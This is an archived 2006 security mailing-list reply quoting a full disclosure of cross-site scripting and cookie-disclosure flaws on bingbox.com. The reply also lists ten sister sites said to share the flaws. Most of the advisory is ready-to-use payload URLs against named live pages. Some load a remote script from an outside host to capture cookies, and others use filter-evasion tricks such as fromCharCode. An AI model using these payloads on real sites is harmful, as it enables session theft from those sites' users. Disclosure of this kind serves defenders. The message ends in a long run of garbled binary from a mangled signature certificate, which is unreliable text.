Hi

Yes, there must be the XSS heaven :)

I contacted the INCROWD Interactive Media first time in March this year and
they always said, that they will patch it. Unfortunately they didn't do
anything until now and I didn't believe that they will do before someone do
a real nasty hack (using for DDoS for example).

There will be some similar products to bingbox.com which have all the same
vulnerabilities:
redbox.de
coolbox.be
coolbox.fr
coolbox.hu
obox.nl
xobox.de
xobox.at
xobox.ch
bingbox.co.uk
gentebox.es

So, we only can hope, that they will now patch it, else it seems to be their
end.

Greetings,
Disenchant

----- Original Message -----
From: <luny (at) youfucktard (dot) com [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Friday, June 16, 2006 8:37 AM
Subject: Bingbox.com - XSS & cookie disclosure

Bingbox.com

Homepage:
http://www.bingbox.com

Affected files:

* Profile input boxes:

- City input

* Registering

* Viewing Birthdays

* Adding a friend

* Viewing people online
-----------------------------------------------

XSS with cookie disclosure via inviting friends:
http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=st
art">">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>
<"<

"<"<'<'<'

XSS vuln with cookie disclosure via "City" input box on profile:

Data isnt properly sanatized before being generated. In one part of the site
its output as full code on the screen (tested using <img> tags, with <table>
tags, no

code displays), and on the other part, an XSS can occur:

For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode
for ':

<TABLE BACKGROUND=javascript:alert('XSS')>

For the cookie:

<TABLE BACKGROUND=javascript:alert(document.cookie)>

--------------------------------------------------

XSS with cookie disclosure when viewing a blog, that redirects you to the
register page:

http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><SCRIPT%20
SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<"

-----------------------------------------------

XSS via viewing birthdays:

http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><I
MG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<
"<""><

"<"

-------------------------------------------------

XSS when adding a new friend. Same as above, we arent able to use ' or long
UTF-8 unicode above, so we use fromCharCode's. PoC:

http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))

><"<"<"<"<'<'<'<"<""><"<"

--------------------------------------------------

XSS vuln when viewing people online:

http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))

><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3

------------------------------------------------

More XSS vulns:

http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><IM
G%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"
<""><

Screenshots:
http://www.youfucktard.com/xsp/bingbox1.jpg
http://www.youfucktard.com/xsp/bingbox2.jpg
http://www.youfucktard.com/xsp/bingbox3.jpg
http://www.youfucktard.com/xsp/bingbox4.jpg
http://www.youfucktard.com/xsp/bingbox5.jpg
http://www.youfucktard.com/xsp/bingbox6.jpg
http://www.youfucktard.com/xsp/bingbox7.jpg
http://www.youfucktard.com/xsp/bingbox8.jpg

__________ NOD32 1.1454 (20060321) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com

0? *?H?÷

 ?0?

10 +0? *?H?÷


 ?à0?h0?
Ñ 
R 
2?ÐØtÊD1(²Û?0
 *?H?÷


0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0
060111094433Z
070111094433Z0K10UThawte Freemail Member1(0& *?H?÷


sven.vetsch (at) disenchant (dot) ch0 [email concealed]?0
 *?H?÷



0?¾æNÐäiL¹`Ir?uÐÆ"òY\Æ$±ú,bW³'C?°d?ùÓ+v±ÏXS?&íYª^Gò?ôÐæaÒ¤
?åsÇdSáâ?qã¹=/ê´Ã÷çôI}Yøw?§¶»ùt4®åÛ(Sû?3;:YNåÝ¼þϐ?&+;ÿX?V?rù


£6040$U0sven.vetsch (at) disenchant (dot) ch0 [email concealed]U

ÿ00
 *?H?÷


??x%?k¸H?#ö±?ìS??i¹V.z«?î¼ÎXRÇv?×Õ ¤lw92g´¨]?-þ1ÀìÄ0JC?"Ý?
ç @·ìѼãuùE Ó¡§?KÔã_GA ?sF¿(ÿØ´_Ý,QÇ»¿Ë?Këô?(+ÍÑðiw
«_?é0?-0?? 

0
 *?H?÷


0Ñ10 UZA10UWestern Cape10U Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷


personal-freemail (at) thawte (dot) com0 [email concealed]
960101000000Z
201231235959Z0Ñ10 UZA10UWestern Cape10U Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷


personal-freemail (at) thawte (dot) com0 [email concealed]?0
 *?H?÷



0?Ôi×Ô°?d[qéGØQ¶êr?°?^}-
{ß?%u(t:B,c'??{Kï~??ê£Ý¹Î?dÂnD¬|æèMq@8¦£?xöù??^­êÀ^vëÙ£]nz|¥KU)??&Õj»8$j?DZڣ??ýyÛåZĹ

£00U

ÿ0

ÿ0
 *?H?÷


Çì?~Nøõ?¥gb*¤ðM`Ðo`Xa¬&»R5\Ï0û¨J??bB#?ôºd?¬G)ߝ?^Òl`q\¢¬Üy
ãçnGµ
(èä?ýô¦Ù|±øÜ_#& ??sÐÞC©?%òæ?/Êþ¦«?u?ÝQ?käøÑÎw¢0??0?¨ 


0
 *?H?÷


0Ñ10 UZA10UWestern Cape10U Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷


personal-freemail (at) thawte (dot) com0 [email concealed]
030717000000Z
130716235959Z0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0?0
 *?H?÷



0?Ä¦<UsUûN¹Ê?ZhÀupßéÿ£ì½Íõ[òv½:aò¿QÎ
ÔåP
0×cZ,?p?ÝÉð+?Zª?qV˯<çñ?6$*Ï+Õó?w=¾+þ»>¿@?dק¦»?eÑÅ*T?H§¶Ñ<
a@dr`·û

£?0?0U

ÿ0

ÿ
0CU<0:08 6 4?2http://crl.tha
wte.com/ThawtePersonalFreemailCA.crl0U
0)U"0 ¤010UPrivateLabel2-1380
 *?H?÷


H?ÑP?ê.Ì
£f¬g¯¬¾Â¡C??L!¸ø6ª-?6/ÀôP ?p<ý­áabÃÙ:~?±?Å?t?%P?bÇÛ'qW%Ý©?9?? Oe_?Ú÷÷?ÖÆN®öê4å[5MwãV!x?Ü!5Þ$±ÓFÿ]_eO1?
Ù0?
Õ

0v0b10 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAR 
2?ÐØtÊD1(²Û?0 + º0 *?H?÷

1 *?H?÷


0 *?H?÷

1
060617110243Z0# *?H?÷

1
?ºc2d[&¶½¥²½4¶
?70[ *?H?÷

1N0L0
*?H?÷
0*?H?÷
?0
*?H?÷

@0+0
*?H?÷

(0+0
 *?H?÷



?bØS?lZ-õp
#zÉÕ¶<i¡6~'ÄOáWéßB?O=ªnI?¹ºU?2xg ?ìäá³5Z??ðsûbEª k']¥ÙDØìîÎz¸ßßËr§Y(³e£?ò·?­=CÛÄ+§q0íÓø$ZnN[?ma®Gá_<å«?qÕ

[ reply ]